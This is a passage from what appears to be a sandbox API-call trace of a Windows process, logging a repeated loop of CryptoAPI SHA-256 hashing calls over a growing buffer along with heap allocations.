	[0229.872] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.872] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d648
	[0229.872] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231d648, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d648, pdwDataLen=0x128ba4) returned 1
	[0229.872] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.872] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.872] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.872] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.872] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0229.872] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.872] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d670
	[0229.872] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231d670, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d670, pdwDataLen=0x128ba4) returned 1
	[0229.872] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.872] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.872] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.873] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.873] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0229.873] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.873] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d698
	[0229.873] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231d698, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d698, pdwDataLen=0x128ba4) returned 1
	[0229.873] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.873] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.873] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.873] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.873] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0229.873] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.873] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d6c0
	[0229.873] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231d6c0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d6c0, pdwDataLen=0x128ba4) returned 1
	[0229.873] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.873] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.873] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.874] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.874] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0229.874] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.874] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d6e8
	[0229.874] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231d6e8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d6e8, pdwDataLen=0x128ba4) returned 1
	[0229.874] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.874] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.874] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.874] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.874] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0229.874] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.874] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d710
	[0229.874] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231d710, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d710, pdwDataLen=0x128ba4) returned 1
	[0229.874] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.874] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.874] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.875] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.875] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0229.875] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.875] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d738
	[0229.875] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231d738, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d738, pdwDataLen=0x128ba4) returned 1
	[0229.875] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.875] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.875] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.875] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.875] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0229.875] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.875] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d760
	[0229.875] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231d760, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d760, pdwDataLen=0x128ba4) returned 1
	[0229.875] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.875] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.875] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.876] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.876] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0229.876] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.876] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d788
	[0229.876] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231d788, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d788, pdwDataLen=0x128ba4) returned 1
	[0229.876] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.876] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.876] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.876] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.876] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0229.876] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.876] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d7b0
	[0229.876] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231d7b0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d7b0, pdwDataLen=0x128ba4) returned 1
	[0229.876] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.876] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.876] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.877] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.877] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0229.877] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.877] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d7d8
	[0229.877] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231d7d8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d7d8, pdwDataLen=0x128ba4) returned 1
	[0229.877] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.877] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.877] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.877] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.877] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0229.877] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.877] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d800
	[0229.877] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231d800, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d800, pdwDataLen=0x128ba4) returned 1
	[0229.877] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.877] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.877] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.878] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.878] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0229.878] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.878] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d828
	[0229.878] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231d828, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d828, pdwDataLen=0x128ba4) returned 1
	[0229.878] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.878] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.878] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.878] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.878] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0229.878] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.878] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d850
	[0229.878] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231d850, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d850, pdwDataLen=0x128ba4) returned 1
	[0229.878] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.878] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.878] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.879] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.879] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0229.879] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.879] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d878
	[0229.879] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231d878, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d878, pdwDataLen=0x128ba4) returned 1
	[0229.879] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.879] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.879] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.879] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.879] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0229.879] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.879] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d8a0
	[0229.879] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231d8a0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d8a0, pdwDataLen=0x128ba4) returned 1
	[0229.879] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.879] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.879] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.880] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.880] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0229.880] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.880] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d8c8
	[0229.880] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231d8c8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d8c8, pdwDataLen=0x128ba4) returned 1
	[0229.880] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.880] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.880] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.880] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.880] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xf40, dwFlags=0x0) returned 1
	[0229.880] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.880] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d8f0
	[0229.880] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231d8f0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d8f0, pdwDataLen=0x128ba4) returned 1
	[0229.880] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.880] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.880] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.881] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.881] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xf60, dwFlags=0x0) returned 1
	[0229.881] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.881] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d918
	[0229.881] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231d918, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d918, pdwDataLen=0x128ba4) returned 1
	[0229.881] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.881] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.881] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.881] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.881] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xf80, dwFlags=0x0) returned 1
	[0229.881] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.881] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d940
	[0229.881] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231d940, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d940, pdwDataLen=0x128ba4) returned 1
	[0229.881] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.881] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.881] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.882] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.882] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xfa0, dwFlags=0x0) returned 1
	[0229.882] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.882] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d968
	[0229.882] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231d968, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d968, pdwDataLen=0x128ba4) returned 1
	[0229.882] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.882] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.882] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.883] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.883] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xfc0, dwFlags=0x0) returned 1
	[0229.883] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.883] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d990
	[0229.883] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231d990, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d990, pdwDataLen=0x128ba4) returned 1
	[0229.883] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.883] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.883] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.883] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.883] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xfe0, dwFlags=0x0) returned 1
	[0229.883] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.883] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d9b8
	[0229.883] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231d9b8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d9b8, pdwDataLen=0x128ba4) returned 1
	[0229.883] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.883] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.883] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.884] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.884] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x1000, dwFlags=0x0) returned 1
	[0229.884] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.884] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d9e0
	[0229.884] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231d9e0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d9e0, pdwDataLen=0x128ba4) returned 1
	[0229.884] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.884] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.884] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2765c68) returned 1
	[0229.884] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x2765c68
	[0229.884] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.884] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.884] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0229.884] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.884] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231da08
	[0229.884] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231da08, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231da08, pdwDataLen=0x128ba4) returned 1
	[0229.884] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.884] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.884] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.885] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
